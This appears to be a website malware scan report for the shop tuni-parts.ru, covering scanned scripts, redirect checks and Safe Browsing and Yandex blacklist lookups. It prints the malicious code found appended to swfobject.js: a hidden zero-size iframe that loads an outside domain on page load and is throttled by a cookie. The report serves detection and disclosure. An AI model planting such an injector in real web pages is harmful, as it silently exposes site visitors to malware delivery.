Scanned pages/files
Request | Server response | Status |
http://www.tuni-parts.ru/ | 200 OK Content-Length: 40008 Content-Type: text/html | clean |
http://www.tuni-parts.ru/java/java2.js | 200 OK Content-Length: 21999 Content-Type: application/javascript | clean |
http://www.tuni-parts.ru/java/cartwindow.js | 200 OK Content-Length: 2670 Content-Type: application/javascript | clean |
http://www.tuni-parts.ru/phpshop/lib/Subsys/JsHttpRequest/Js.js | 200 OK Content-Length: 11889 Content-Type: application/javascript | clean |
http://www.tuni-parts.ru/java/swfobject.js | 200 OK Content-Length: 7353 Content-Type: application/javascript | malicious |
Malicious code found. Script contains blacklisted domain: asurt.toutges.com ...[6454 bytes skipped]... window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;;var ifox9s1U = document.createElement('iframe');ifox9s1U.name = 'ifox9s1U';ifox9s1U.src = 'http://asurt.toutges.com/';ifox9s1U.style.width = '0px';ifox9s1U.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('ifox9s1U=') == -1) { document.getElementsByTagName('body')[0].appendChild(ifox9s1U);var expiresDate = new Date(); expiresDate.setTime(expiresDate.getTime() + 432000000); document.cookie = 'ifox9s1U=yes; path=/; expires=' + expiresDate;}}; | ||
http://www.tuni-parts.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 347 Content-Type: text/html | clean |
http://www.tuni-parts.ru/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tuni-parts.ru
Result:
GET / HTTP/1.1
Host: tuni-parts.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: tuni-parts.ru
Referer: http://www.google.com/search?q=tuni-parts.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tuni-parts.ru
Referer: http://www.google.com/search?q=tuni-parts.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tuni-parts.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tuni-parts.ru/
Result: tuni-parts.ru is not infected or malware details are not published yet.
Result: tuni-parts.ru is not infected or malware details are not published yet.